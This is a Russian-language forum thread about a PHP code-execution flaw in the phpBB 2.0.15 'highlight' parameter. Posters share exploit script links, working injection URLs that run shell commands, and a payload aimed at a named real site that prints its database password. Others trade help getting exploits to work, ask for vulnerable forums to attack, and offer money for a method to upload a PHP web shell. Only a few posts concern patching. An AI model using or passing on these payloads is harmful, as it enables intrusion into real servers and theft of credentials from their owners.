Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 След.
RSS
Выполнение произвольного PHP сценария в phpBB в коде highlighting
 
Вот и у меня тоже самое, у меня тоже есть один не оконченный взлом, вот сейчас момент такой а сплоит написать нифига не получается.
 
Может попробовать поставить между командами $IFS ?
 
Цитата
Transmutagen пишет:
Может попробовать поставить между командами $IFS ?

помогает, но не везде. =(
 
чуточку переделаный сплоит от версии 2.0.10
http://iron.vzletka.net/spl.txt
работает, проверено
 
Люди! Не понимаю чего паритесь! Написанно же: уязвимость 2.0.15, а не <=2.0.15! Вот там все и работает! даже не нужно изобретать велосипед!

Пример: target/forum/viewtopic.php?p=2&highlight=%27.$poster=ls -al.%27
 
Млин! Форум апострофы проглотил! =\

Пример такой: target/forum/viewtopic.php?p=2&highlight=%27.$poster=%60ls -al%60.%27

PS: Приведу код злополучного "исправления" для 2.0.14, из-за которого и появилась бага:

Код
# 
#-----[ OPEN ]--------------------------------------------- 
# 
viewtopic.php

#
#-----[ FIND ]---------------------------------------------
# Line 1110
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $message = str_replace(\", ", substr(@preg_replace(#(\>(((?>([^><]+|(?R)))*)\<))#se, "@preg_replace(#\b(" . $highlight_match . ")\b#i, <span style=\"color:#" . $theme[fontcolor3] . "\"><b>\\\\1</b></span>, \\0)", > . $message . <), 1, -1));

#
#-----[ REPLACE WITH ]---------------------------------------------
# 
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $message = str_replace(\", ", substr(@preg_replace(#(\>(((?>([^><]+|(?R)))*)\<))#se, "@preg_replace(#\b(" . str_replace(\\, \\\\, $highlight_match) . ")\b#i, <span style=\"color:#" . $theme[fontcolor3] . "\"><b>\\\\1</b></span>, \\0)", > . $message . <), 1, -1));
 
в версии 2.0.14 уязвимости нет!
Код
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$words = explode( , trim(htmlspecialchars($HTTP_GET_VARS[highlight])));

вот это стоит перед этим.
 
http://www.digitalsec.net/stuff/olds/phpbb2_0_15.pl
 
Кривой сплойт у дигитал секурити. Я его переписал немного. Сегодня появится в журнале mazafaka.ru .
Сплойт от дигитал секурити результаты выводит криво, до жути.
Так что следите за рекламой :)
 
Плохо. Уязвимость позволяет выполнить PHP команды на сервере.
Примеры:
http://russian-belgium.be/viewtopic.php?t=14497&&highlight=% 27.$poster=print(Доброе%09утро%09Admin%20).%27

http://russian-belgium.be/viewtopic.php?t=14497&&highlight=% 27.$poster=$dbpasswd.%27

Срочно лечим!
 
товарищи из phpBB перестали писать версию борды в копирайтах..
искать нужную версию стало сложнее... [IMG]http://www.securitylab.ru/forum/smileys/smiley7.gif[/IMG]
 
Ыыы, я еще во времена 2.0.10 прописал на начало функции highlight die(); Как вижу не зря.
 
Хм. Что-ТО мне не везет, все форумы мне почему-то не узявимые попадаются. Пользуюсь эксплоитом предоставленным Poiz0nом, не выполняются команды :(.

Если кто нашел уязвимый форум, киньте линк плиз в личку, проверить все-таки хочется... а то может проблемы у меня.
 
Сплоит конектится к серваку, но команды не выполняются. он их просто проглатывает без вывода инфы в консоль :( Почему?
 
Обсолютно такая же ситуация. Почему так происходит. ls -la он проглоти, подумал, ждет новой команды.
 
Ребяты а сохранились у кого-нибудь статьи о взломе phpbb 2.0.4 ??
 
кстати есть ли способ узнать реальную версию phpbb?

xttp://www.abhazia.com/phpBB/ вот какая у них версия?
 
На пхп есть у кого эксплойт?
А то я в перле не волоку :(
 
прикольная уязвимость... :)
 
kto nibud znaet robochiy sposob zalit php shell na 2.0.15 s pravami nobody. WGET nerabotaet, hotya rabotaet esli v /tmp (mogno ego kakto ot tuda skopirovat?) , Cherez bazu output into outfile toge neprohodit, cherez INCLUDE pitalsya neche nesmog. Please pomogite esli est robochiy sposob. srazu poshlu 50 wmz esli rasskagite rabochiy sposob. mogu s protekciey pered informaciey. spasibo badstan@gmail.com
Страницы: Пред. 1 2 3 След.
Читают тему